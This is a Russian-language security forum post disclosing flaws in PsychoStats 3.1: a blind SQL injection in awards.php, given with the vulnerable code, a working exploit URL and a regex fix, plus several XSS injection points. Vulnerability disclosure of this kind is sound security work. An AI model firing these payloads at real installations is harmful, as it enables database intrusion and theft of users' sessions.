Старый 04.07.2010, 12:20   #1
oRb
 
Аватар для oRb
 
Регистрация: 01.07.2010
Сообщений: 319
Репутация: 138
По умолчанию PsychoStats

Сайт: http://www.psychostats.com/
Версия: 3.1
Дата: 03.01.2010

Blind SQL-injection
Файл: awards.php
PHP код:
if (empty($d) or !preg_match('/\d\d\d\d-\d\d?-\d\d?/'$d)) {
    
$d date('Y-m-d');
//    $d = $range[$v]['max'];
}
...
$cmd "SELECT awarddate FROM $ps->t_awards WHERE awardrange = '$v' AND awarddate <= '$d' ";
if (
$p$cmd .= "AND topplrid=$_p ";
$cmd .= "ORDER BY awarddate DESC LIMIT 1";
list(
$d) = $ps->db->fetch_list($cmd); 
Результат попадает вторым параметром в функцию date.
Exploit: /awards.php?d=2009-12-01'+and+0+union+select+1%23
Зависимости: -
Решение: замена паттерна на следующий "/^\d\d\d\d-\d\d?-\d\d?$/"


XSS
Код:
/query.php?s=[XSS]
/ajax/flaglist.php?id='%3E[XSS] (работает только для зареганных)
/ajax/iconlist.php?id='%3E[XSS] (работает только для зареганных)
/admin/login.php?ref=%22%3E[XSS]
__________________
Не оказываю никаких услуг.
I don't provide any services.
oRb вне форума   Ответить с цитированием
Ответ

Метки
psychostats, sql-injection, xss

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot